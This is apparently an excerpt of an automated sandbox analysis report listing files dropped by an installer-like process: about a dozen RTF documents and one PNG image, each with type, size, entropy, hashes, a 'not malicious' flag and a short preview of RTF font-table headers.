                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f41\fbidi \fswiss\fcharset162\fprq2 Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45800
                                                                                                                                                                                                                                                          Entropy (8bit):5.097060523282222
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrb5Ke8ctMRcPMRC90OmDcPMRC90Okj+yXpcrb+/z3OgwXG6IN:085ERZau3OgwXG6IN
                                                                                                                                                                                                                                                          MD5:BF226FC63E045046722D8F7D54D3CD48
                                                                                                                                                                                                                                                          SHA1:6134D8D56E0E9FADBCB931CD091513E69A766D33
                                                                                                                                                                                                                                                          SHA-256:1BC9F58D4EC025B08FF100A71397F11FDE77AFF49271545A7C91ABCECB95BD39
                                                                                                                                                                                                                                                          SHA-512:EAA01E5017FE5E9EB5C383C708F0229AFFE70E465D7460BDA475117BD56B12DC52669D59DFEADD28EB8B82696ECB48BF8F0F6BF13422D733FBD98EDD54E7A10B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45843
                                                                                                                                                                                                                                                          Entropy (8bit):5.099884587726615
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRfvKmGHTwjjJ6jNBmuIV3brtE/TnFkUpv0jxZGcAK0njUZXZo7IJJY:XHCMHJ2
                                                                                                                                                                                                                                                          MD5:FE6B9C7CF4F0B6627DEB585E904CDBEB
                                                                                                                                                                                                                                                          SHA1:552B91CE134693F121234EB5E3CA538C60449B7A
                                                                                                                                                                                                                                                          SHA-256:74FDB6A5CAB4DAF2D175C831124D75631EBD1247BF1C09F43BA8CDA3B4241B56
                                                                                                                                                                                                                                                          SHA-512:ABE4C5B9A2B1F074A4D9A470AE2173282DFCDE63382CCC7311DF3822698CDB4A7F02B98D85AAF3DFFBC0E97F734E026D5F97438858AB5BC76821F4CD8D2D22E5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56877
                                                                                                                                                                                                                                                          Entropy (8bit):5.08048638360949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRf9q5GHTwjjJ6jNBmuIV3brtE/TnFkUpvMT1u55U4hU8Gs2PsYyCGsDt/8pA1T:XV/wT1QgfTHJ3
                                                                                                                                                                                                                                                          MD5:300A9C30F7C747136B0481B5765852E8
                                                                                                                                                                                                                                                          SHA1:A7DFA3454EDA5842B17AC27684B359EFBE68DF52
                                                                                                                                                                                                                                                          SHA-256:878EFDAD351F09C39DE3B711B25265E029847775500FE0C407D87898BD270158
                                                                                                                                                                                                                                                          SHA-512:9B989F4C7A3983F869C3F4FA694FF0B27661C4A88853684D84531ED12B317EE3172C1D9E0A100FBD6413ABE97FE50F6DB71A8DC3BF27F3716476830EC76683BC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41746
                                                                                                                                                                                                                                                          Entropy (8bit):5.1082830705303195
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRnomp/z3OgwXG6Ik:TL433OgwXG6Ik
                                                                                                                                                                                                                                                          MD5:66827CCAAE125825B1E69A77C2F3C184
                                                                                                                                                                                                                                                          SHA1:AF5BE3BBE593D4327EA77157EE4780A185C50710
                                                                                                                                                                                                                                                          SHA-256:6444F8ADA3675836844F7320C0F588572EE3D7C890A4DD5E8132CB17DC7FCBAA
                                                                                                                                                                                                                                                          SHA-512:526058E0E367398C4E3295DA8B0F07118A1DF628DE4CBEDE276516E1FB045A33B2757768AE3713833F24A23E49667BC33BA43679844B0E68A9843CE390416984
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43858
                                                                                                                                                                                                                                                          Entropy (8bit):5.1066210164319585
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sw9FmdVFroAWBmho4cnTseR4Jv6YfpgC/z3OgwXG6I7:TL4w3OgwXG6I7
                                                                                                                                                                                                                                                          MD5:47A87D6CE96B1DCA2C609A778373485D
                                                                                                                                                                                                                                                          SHA1:15823BE17A06C6C57EBAF6D0E55F56EBF0EFE98F
                                                                                                                                                                                                                                                          SHA-256:9276B70DE54E2675E72A84AE277563D4518A0DC56565379378A7CC3B10488697
                                                                                                                                                                                                                                                          SHA-512:D717567ED8C4A25270312E31F2481241A9B164B8A04D19C68A1BF3F9BD8890F99C3A0F4A76AFD6A4A24208F1BE16D9F10FCEEB36099828FCD3F35AC8E92C498E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50542
                                                                                                                                                                                                                                                          Entropy (8bit):5.082123818083202
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbAKeJcmz0s4ieSRukoMV8SLpmo8uSYSyWBKnObct3/nf4qY3BtHn+/z3Ogwa:08A7YM3OgwXG6I5
                                                                                                                                                                                                                                                          MD5:8375A1338E343C284BB1EA8461B16EF5
                                                                                                                                                                                                                                                          SHA1:5329FB0F5AFB566177F45FE49A7FF0411571CB6C
                                                                                                                                                                                                                                                          SHA-256:6024A7AA29911E5D8670FC1028749D736D95115AA89E07DC00C823E68101B032
                                                                                                                                                                                                                                                          SHA-512:98D1213836A17D44072B11488BF9FB5DF408A3B7E1D0EED7CAE13C3C6DDEF09EE52C613C20C7277410BAFD57644A88B4EF9286B9BB5D31C79DB6E9D30F4317AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41095
                                                                                                                                                                                                                                                          Entropy (8bit):5.105004070141461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:0LMrbpuh4puRkAzKqCV9mdecy46Xo/zdUIpeabve:08pxnmdq46IdUIpeabve
                                                                                                                                                                                                                                                          MD5:90E7A977D4DF30B041F323B8039EC7CF
                                                                                                                                                                                                                                                          SHA1:792587C64C654021CEBEC446E6DDB08A49D1B2DA
                                                                                                                                                                                                                                                          SHA-256:F7E70A032DFF7371ADB12C85526C4A5F75F8B4C381EAC028873B8DB8AC0F77B3
                                                                                                                                                                                                                                                          SHA-512:E35BB3A910EB4D5CB2249E3833A02C41153EB88B02C5FC949B4FFE7C0F6CF436F2BEB977670FF1155F89774C2499C15453A468D3A094DF6370C02C0954E291A1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43496
                                                                                                                                                                                                                                                          Entropy (8bit):5.1077571102439245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRIMXyTsx/z3OgwXG6I2:TL4P3OgwXG6I2
                                                                                                                                                                                                                                                          MD5:FDD5D42614DC8C5255D6808F5FB9E756
                                                                                                                                                                                                                                                          SHA1:462F1BE33F4DE680C46F27A2732136F2A96EFB29
                                                                                                                                                                                                                                                          SHA-256:1615765F4CC8649F16975820F90F5FA6117F28CD97771021C8C8449B169B6DF7
                                                                                                                                                                                                                                                          SHA-512:46CD50DDBE274A62EC6E9D8650A71C16D4B213E56700CDB5FDE6BB880CC2096BD21934BADD8B27076313E9F57DAE468F431674B7D55D65C59C4B0DEA6922307B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42485
                                                                                                                                                                                                                                                          Entropy (8bit):5.10644966338614
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseR6NnE0/z3OgwXG6Iq:TL423OgwXG6Iq
                                                                                                                                                                                                                                                          MD5:2F22B5B2B29308EFA8F83A2A7756F134
                                                                                                                                                                                                                                                          SHA1:5AA36D0592B3A10518F28AFA7C65D338FD29B64E
                                                                                                                                                                                                                                                          SHA-256:F19658BABB054B874513345E81C3F3294FABF41C2F1A35B245510E307F782A5C
                                                                                                                                                                                                                                                          SHA-512:34902F5B360C5DA92E49B7C22D18250D504CF3186F229FADE902AFE617B3B13D47D0E8CB11B2423F8A1DA487B1140D96DCCB22613EE16D3ACB9BFB5DD72F1071
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43564
                                                                                                                                                                                                                                                          Entropy (8bit):5.107218209627063
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:TLmrs4sAvnoBVFroAWBmho4cnTseRNoUCXap/z3OgwXG6Iu:TL4f3OgwXG6Iu
                                                                                                                                                                                                                                                          MD5:1D227690D1B4A573597374FEDFC0E5A9
                                                                                                                                                                                                                                                          SHA1:73BD11FEBB9219AD6FA0273AFF4B7440E594C3AA
                                                                                                                                                                                                                                                          SHA-256:D795CFADCCA7514424BD9A335CB14C4AB410225B7A2628982BC9A33851E4DB3C
                                                                                                                                                                                                                                                          SHA-512:BD589D52D6F12E9A02814C67DC52EBECC1EECBB3A686BBED7A25C9F65A8A1A7D5BF331DF61933CD0A4A383A80366867AA2890F371174F77FF4E4B153DD20ED17
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1254\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1055\deflangfe1055\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset162\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset162\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset162\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset162\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset162\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41048
                                                                                                                                                                                                                                                          Entropy (8bit):5.100342903202798
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:XFRfQuekVh+DiDhZ6jN3muIV3brtEeLUsQZZ6jNS23FmsZo7I1Jj:XYz0CyH1V
                                                                                                                                                                                                                                                          MD5:830A25F0F0DD4201CEDCE5A71290F52B
                                                                                                                                                                                                                                                          SHA1:7E8035CB05D3883857F729AD02FC772425DE859E
                                                                                                                                                                                                                                                          SHA-256:02A019309A83F3E82D5231C7E1861F7A54FFDF8C55C0357DC8335E56D89A8806
                                                                                                                                                                                                                                                          SHA-512:5F25190BE2A3C305113595C9517DC4CBDB7D6D6DE35B514C1E6F15AEC3BEDA831F6A600D5876262D93B93A40245A1599D0BFA5CAA37F94937C30E6B4ECB52EF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch37\stshfhich37\stshfbi37\deflang1049\deflangfe1049\themelang1055\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f030202
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):76673
                                                                                                                                                                                                                                                          Entropy (8bit):7.9848305082884155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:MAid3jb4CBlw8s1Q/03i/NRj/CWM9oLMqFAT5/EUx:MpoC/l703mx29ZwA9H
                                                                                                                                                                                                                                                          MD5:3A12AA38DC04011E4267D84F9DF29A16
                                                                                                                                                                                                                                                          SHA1:DB2B83756D27969D5701F20925A023B282B2212F
                                                                                                                                                                                                                                                          SHA-256:16F1E3749736EC4BC63E0E64474FEDFED96468EE5901D1E3DADD3490C2B72380
                                                                                                                                                                                                                                                          SHA-512:51A27A92771E6D2475A0B13965064A2C0BD4F9074E4CB344CBFFE046189F5B3A130321C7651C25F37BF66CF312D8A953B77FC4CE99F47C55A2FB63603D8CC47B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
